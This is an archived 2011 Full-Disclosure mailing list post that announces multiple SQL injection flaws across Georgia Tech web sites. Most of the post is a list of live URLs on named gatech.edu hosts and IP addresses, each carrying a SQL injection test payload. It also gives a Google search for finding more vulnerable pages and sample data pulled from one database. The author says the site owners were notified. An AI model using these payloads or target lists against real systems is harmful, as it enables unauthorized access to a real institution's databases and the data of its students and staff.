lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-Id: <8CD818AC3AD532C-D04-1789@web-mmc-m02.sysops.aol.com>
Date: Thu, 13 Jan 2011 17:45:51 -0500
From: cats@...l.net
To: full-disclosure@...ts.grok.org.uk
Subject: gatech.edu,
	multiple remote SQL injection vulnerabilities


 *********************************************************
#                        Georgia Tech                             
#   Multiple remote SQL Injection Vulnerabilities       
*********************************************************
#                                                                    
#               Author: cats                                   
#               Domain: gatech.edu                       
#                                                       
# [1] Description                                       
# [2] Extracted sample data                             
# [3] Vulnerabilities and details                       
#                                                       
*********************************************************


[1] Description

A large amount of vulnerabilities have been found in just
about every site and service that gatech.edu has online.
The ones listed here in this document are just a small
amount of the real deal, and these are only SQL injections,
which seems to be their biggest issue. And with a simple 
Google dork, a lot of more vulnerabilites can be found
under this domain.

Since one of their issues lies in /news/event.php, a 
simple Google search of that, within the domain will show
a lot of their affected sites.

https://encrypted.google.com/search?q=allinurl:
+/news/event.php%3Fid%3D+site:gatech.edu&hl=en

The people responsible for these services have been notified.

A very limited amount of sensitive information will be
disclosed in this document (apart from the vulnerabilities). 


[2] Extracted sample data

IP: 130.207.160.82
URL: http://www.studentaffairs.gatech.edu/plugins/content/index.php?id=21
Database username: studentaffairs@...-plesk1.gatech.edu
Database name: studentaffairs
Database Version : 5.1.40-community-log
Number of tables in database: 228


[3] Vulnerabilities and details

130.207.160.82
http://www.chemistry.gatech.edu/events/special/index.php?sID=1%20AND%201=2
http://www.successprograms.gatech.edu/plugins/content/index.php?id=181' OR 1='1
http://www.studentaffairs.gatech.edu/plugins/content/index.php?id=21' OR 1='1 
http://webdev.gatech.edu/46/plugins/content/index.php?id=129' OR 1='1
http://www.cqgrd.gatech.edu/story.php?id=5137%20AND%201=2
http://www.crc.gatech.edu/plugins/content/index.php?id=351%27%20AND%201=%271
http://www.chemistry.gatech.edu/news/release.php?id=4570%20AND%201=1
http://www.inta.gatech.edu/news-events/news/release.php?id=5167%20AND%201=2
http://www.inta.gatech.edu/news-events/events/event.php?id=6439%20AND%201=2
http://www.cetl.gatech.edu/events/event.php?id=5830%27 
http://www.profpractice.gatech.edu/news/event.php?id=4019%20AND%201=1
http://www.hts.gatech.edu/news/event.php?id=3679%20AND%201=1
http://www.cope.gatech.edu/news/event.php?id=5900%20AND%201=1
http://www.ptfe.gatech.edu/news/event.php?id=5367%20AND%201=1
http://www.honor.gatech.edu/plugins/content/index.php?id=9%27%20AND%201=%271
http://www.career.gatech.edu/plugins/content/index.php?id=241%27%20AND%201=%271
http://www.gradcoop.gatech.edu/news/event.php?id=5112%20AND%201=2
http://www.coop.gatech.edu/news/event.php?id=5208%20AND%201=2
http://www.op.gatech.edu/news/story.php?id=1256%20AND%201=1

128.61.179.103
http://tempest.arch.gatech.edu/news/story.php?id=1233%20AND%201=1
https://escol.coa.gatech.edu/news/story.php?id=1187%20AND%201=2

130.207.91.98
http://www.ptfe.gatech.edu/news/event.php?id=5803%20AND%201=2

130.207.66.87
http://www.biology.gatech.edu/news/story.php?id=5201%20AND%201=1
http://www.test.biology.gatech.edu/news/story.php?id=3096%20AND%201=1

128.61.135.12
http://www.bme.gatech.edu/calendar/calendar_files/event_info.php?event_id=457%20AND%201=1

130.207.243.18
http://www.housing.gatech.edu/features/FeatureDisplay.cfm?FEATNO=159%20AND%201=2

130.207.244.120
http://www.gatech.edu/departments/index.html?id=1186%20AND%201=1%20--
http://www.gatech.edu/contact/index.html?id=n5183%20AND%201=1 
http://www.gatech.edu/news-room/contact-person-news.php?id=1896&n=5183 AND 1=2 

Other (Mostly new ones, not checked for blind or visible SQLi)
http://www.test.biology.gatech.edu/news/story.php?id=3096%20AND%201=1
http://www.op.gatech.edu/news/story.php?id=1256%20AND%201=1
http://tempest.arch.gatech.edu/news/story.php?id=1233%20AND%201=1
https://escol.coa.gatech.edu/news/story.php?id=1187%20AND%201=2
http://www2.me.gatech.edu/www/theses/summary.asp?db=1&LASTNAME=Abbasi&FIRSTNAME=Zubair'
http://dcom.arch.gatech.edu/pcibim/memberscomment.asp?docid=30
http://bim.arch.gatech.edu/app/bimtools/tool.asp?id=431&app_id=15
http://bim.arch.gatech.edu/content_view.asp?id=550%20AND%201=1

(Needs POST data, use the search field)
http://www2.me.gatech.edu/www/theses/Search.asp


#End of file

 



Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ